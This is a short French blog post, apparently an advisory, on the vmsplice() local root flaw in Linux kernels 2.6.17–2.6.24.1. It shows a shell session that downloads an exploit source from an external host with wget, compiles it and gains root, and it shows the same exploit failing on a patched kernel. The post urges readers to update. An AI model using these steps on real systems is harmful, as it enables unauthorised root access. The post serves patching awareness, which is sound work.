Depuis peu, une faille a été découverte dans l’appel du système vmsplice(), les noyaux Linux 2.6.17 à 2.6.24.1 sont touchés. Elle est plutôt critique puisqu’un simple utilisateur peut devenir root en l’exploitant.
1 2 | $ uname -smr Linux 2.6.23.16.. i686 |
Voici un exemple d’utilisation :
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 | $ cd /tmp $ wget http://www.crashdump.fr/~polux/rootexploit/rootexploit.c $ gcc -o rootexploit rootexploit.c $ ./rootexploit ----------------------------------- Linux vmsplice Local Root Exploit By qaaz ----------------------------------- [+] mmap: 0x0 .. 0x1000 [+] page: 0x0 [+] page: 0x20 [+] mmap: 0x4000 .. 0x5000 [+] page: 0x4000 [+] page: 0x4020 [+] mmap: 0x1000 .. 0x2000 [+] page: 0x1000 [+] mmap: 0xb7dee000 .. 0xb7e20000 [+] root Exploit gone! # id -u 0 |
… voila qui est plutôt grave, mettez donc a jour vos kernel:
1 2 | $ uname -smr Linux 2.6.24.2.. i686 |
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 | $ ./rootexploit ----------------------------------- Linux vmsplice Local Root Exploit ----------------------------------- [+] mmap: 0x0 .. 0x1000 [+] page: 0x0 [+] page: 0x20 [+] mmap: 0x4000 .. 0x5000 [+] page: 0x4000 [+] page: 0x4020 [+] mmap: 0x1000 .. 0x2000 [+] page: 0x1000 [+] mmap: 0xb7dfc000 .. 0xb7e2e000 [-] vmsplice: Bad address $ id -u 1000 |
De plus, on pourrais imaginer une utilisation de cet exploit via des scripts cgi, php,.. Mal programmé – En exploitant une faille include – Et la je vous laisse imaginer le drame !
Un petit conseil donc: Mettez votre système à jour régulièrement !
